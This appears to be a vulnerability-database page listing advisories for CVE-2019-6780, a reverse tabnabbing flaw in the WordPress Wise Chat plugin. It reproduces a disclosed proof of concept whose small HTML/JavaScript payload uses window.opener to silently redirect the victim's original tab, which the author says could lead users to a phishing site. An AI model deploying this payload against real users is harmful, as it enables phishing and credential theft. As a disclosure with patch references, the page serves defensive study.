| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| Wordpress Wisechat 2.6.3 Plugin - Reverse Tabnabbing Vulnerability | 25 Jan 201900:00 | – | zdt | |
| WordPress Wise Chat Plugin Has Unspecified Vulnerability | 28 Jan 201900:00 | – | cnvd | |
| CVE-2019-6780 | 24 Jan 201920:00 | – | cve | |
| CVE-2019-6780 | 24 Jan 201920:00 | – | cvelist | |
| EUVD-2019-16338 | 7 Oct 202500:30 | – | euvd | |
| Wordpress Plugin Wisechat 2.6.3 - Reverse Tabnabbing | 25 Jan 201900:00 | – | exploitpack | |
| CVE-2019-6780 | 24 Jan 201920:29 | – | nvd | |
| WordPress Wise Chat Plugin < 2.7 Mashandling of External Links Vulnerability | 6 Mar 201900:00 | – | openvas | |
| CVE-2019-6780 | 24 Jan 201920:29 | – | osv | |
| WordPress Wisechat 2.6.3 Forced Redirect / Phishing | 25 Jan 201900:00 | – | packetstorm |
# Exploit Title: Wordpress Plugin Wisechat <= 2.6.3 - Reverse Tabnabbing
# Date: 01-22-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://kaine.pl/
# Softwae Link: https://wordpress.org/plugins/wise-chat/
# Version: Up to V2.6.3
# Tested on: Debian 9 - Apache2 - Wordpress 4.9.8 - Firefox
# CVE : 2019-6780.
# Plugin description:
Wise Chat is a leading chat plugin that helps to build a social network and to increase user engagement on your website by providing the possibility to exchange real time messages in chat rooms. The plugin is easily installable and extremely configurable. Its features list is growing all the time.
# POC
Send following URL on wise chat "http://mtk911.cf/OR/" which has the following html
<html>
<script>
if (window.opener) window.opener.parent.location.replace('http://mtk911.cf/');
if (window.parent != window) window.parent.location.replace('http://mtk911.cf/');
</script>
Open Redirect TEST
</html>
when you click on that user. This opens in a new tab, and the parent tab is silently redirected to my website without asking the user.
#Technical Details & Impact:
In a real life example, this would redirect to a phishing site to try gain credentials for users.
# References:
https://wordpress.org/plugins/wise-chat/#developers
https://plugins.trac.wordpress.org/changeset/2016929/wise-chat/trunk/src/rendering/filters/post/WiseChatLinksPostFilter.php
https://plugins.trac.wordpress.org/changeset/2016929/wise-chat/trunk#file6
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6780Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation